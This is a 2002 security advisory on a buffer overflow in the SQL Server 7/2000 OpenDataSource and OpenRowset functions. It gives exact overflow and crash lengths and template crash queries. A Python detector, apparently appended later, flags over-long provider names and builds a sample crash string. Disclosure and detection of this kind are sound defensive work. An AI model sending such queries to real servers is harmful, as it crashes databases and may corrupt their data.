Security Advisory

Name: MSDE, SQL Server 7 & 2000 Ad Hoc Heterogeneous Queries Buffer Overflow and DoS
System Affected: MSDE, SQL Server 7, SQL Server 2000 with all service packs and fixes applied
Severity: High
Author: Cesar Cerrudo
Date: 19th February 2002
Advisory Number: CC020201

Description:

Distributed queries access data from multiple heterogeneous data sources, which can be stored on either the same or different computers. Microsoft SQL Server supports distributed queries by using OLE DB, the Microsoft specification of an application programming interface (API) for universal data access.

Distributed queries provide SQL Server users with access to:
- Distributed data stored on multiple computers that are running SQL Server.
- Heterogeneous data stored in various relational and non-relational data sources that can be accessed using an OLE DB provider.

You can reference heterogeneous OLE DB data sources in Transact-SQL statements by:
- Linked servers, OpenQuery function.
- OpenDataSource and OpenRowset functions.

The OpenDataSource and OpenRowset functions are accessible to all users and contain an unchecked buffer in one of their parameters. The buffer overflow and DoS problem occurs when an overly long string is supplied in the "provider name" parameter.

Details:

In SQL Server 7 the overflow starts at character number 6819, and if the number of characters is >= 6918 the server will crash:

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6819 characters or more ,'')...nothing
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6819 characters or more ,'', '')

In SQL Server 2000 the overflow starts at character number 6887, and if the number of characters is >= 6998 the server will crash:

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6887 characters or more ,'')...nothing
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6887 characters or more ,'', '')

Depending on the amount of characters, some registry values are overwritten.
Try these examples and then take a look at the dump file.

Patch Available: NONE

Workaround: Shut down the servers.

Vendor Status: Microsoft was contacted.

When I contacted them I explicitly told them that I would apply RFPolicy v2. They asked me for the details and I gave them to them, and then they told me that they would contact me again. The first time they walked on the edge of the policy, and on the 5th day they contacted me again. Now I haven't been contacted by them in the last 8 days, so I am disclosing the information. Maybe this is a new Microsoft policy, to not contact the researcher in the proper time and not spend time writing a three-word mail. One more thing: Microsoft doesn't digitally sign the mails from the Security Response Center when they contact you; I think this is a vulnerability.

I discovered another 3 or 4 security holes in SQL Server of varying severity; I will release them soon.

Don't blame me for this please, blame MICROSOFT!!!!!!!!!
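Since no patch exists, a defender can at least flag the condition in captured or proxied T-SQL. The following added example (not part of the advisory) parses the first string literal passed to OPENDATASOURCE/OPENROWSET, handling the T-SQL doubled-quote escape, and classifies it against the per-version overflow and crash lengths given in the Details section; the sample statements at the bottom are constructed for illustration.

```python
import re

# Length thresholds from the advisory: first character count at which the
# provider-name argument overruns the buffer, and the count at which the
# server crashes (SQL Server 7 and SQL Server 2000 respectively).
THRESHOLDS = {"sql7": (6819, 6918), "sql2000": (6887, 6998)}

_CALL_RE = re.compile(r"\b(OPENDATASOURCE|OPENROWSET)\s*\(", re.IGNORECASE)


def first_string_literal(sql, start):
    """Decode the T-SQL string literal that begins at or after `start`.
    A doubled quote ('') is the escape for one quote; returns None if the
    argument is not a quoted literal or the literal is unterminated."""
    i = start
    while i < len(sql) and sql[i].isspace():
        i += 1
    if i >= len(sql) or sql[i] != "'":
        return None
    out, i = [], i + 1
    while i < len(sql):
        if sql[i] == "'":
            if sql[i + 1:i + 2] == "'":      # escaped quote counts as one char
                out.append("'")
                i += 2
                continue
            return "".join(out)
        out.append(sql[i])
        i += 1
    return None

def check_statement(sql, version="sql2000"):
    """Classify each OPENDATASOURCE/OPENROWSET call in `sql` by the length of
    its provider-name argument. Returns [(function, length, verdict)] where
    verdict is 'ok', 'overflow' or 'crash'."""
    overflow_at, crash_at = THRESHOLDS[version]
    findings = []
    for m in _CALL_RE.finditer(sql):
        literal = first_string_literal(sql, m.end())
        if literal is None:          # variable or expression, not a literal
            continue
        n = len(literal)
        verdict = "crash" if n >= crash_at else "overflow" if n >= overflow_at else "ok"
        findings.append((m.group(1).upper(), n, verdict))
    return findings

# Constructed sample statements (not from the advisory).
SAMPLE_BENIGN = "SELECT * FROM OPENROWSET('MSDASQL', 'DSN=x', 'SELECT 1')"
SAMPLE_CRASH = "SELECT * FROM OpenDataSource('" + "X" * 6998 + "', '')"
```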